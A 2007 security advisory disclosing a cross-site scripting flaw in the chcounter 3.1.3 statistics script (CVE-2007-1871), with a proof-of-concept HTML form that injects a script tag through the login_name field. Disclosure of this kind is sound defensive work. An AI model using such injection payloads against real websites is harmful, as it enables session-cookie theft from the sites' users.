CVE-2007-1871.txt

`Cross site scripting in chcounter 3.1.3  
  
security advisory  
  
References:  
http://chcounter.org/  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1871  
  
Description:  
Cross site scripting describes attacks that allow to insert malicious  
html or javascript code via get or post forms. This can be used to steal  
session cookies.  
chcounter is some free software php script for website statistics. The  
login form on the start page can be used to insert javascript code.  
  
Workaround/Fix:  
There's no vendor fix.  
Vendor has been contacted 2007-03-11 and has not answered yet.  
  
Sample Code:  
<form method=post action=http://chcounterinstallation/stats/>  
<input type=hidden name=login_name value='"><script>alert(1)</script>'>  
<input type=submit>  
</form>  
  
CVE Information:  
The Common Vulnerabilities and Exposures (CVE) project has assigned the  
name CVE-2007-1871 to this issue. This is a candidate for inclusion in  
the CVE list (http://cve.mitre.org/), which standardizes names for  
security problems.  
  
Credits and copyright:  
This vulnerability was discovered by Hanno Boeck of schokokeks.org  
webhosting.  
It's licensed creative commons attribution:  
http://creativecommons.org/licenses/by/3.0/  
  
Hanno Boeck, 2007-04-12, www.hboeck.de  
`